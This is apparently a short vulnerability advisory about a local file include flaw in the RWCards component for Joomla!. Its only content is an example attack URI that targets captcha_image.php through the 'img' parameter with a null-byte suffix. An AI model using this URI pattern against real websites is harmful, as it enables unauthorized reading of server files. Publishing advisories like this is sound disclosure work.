Joomla! RWCards Component 'captcha_image.php' Local File Include Vulnerability

info
discussion
exploit
solution
references

Joomla! RWCards Component 'captcha_image.php' Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00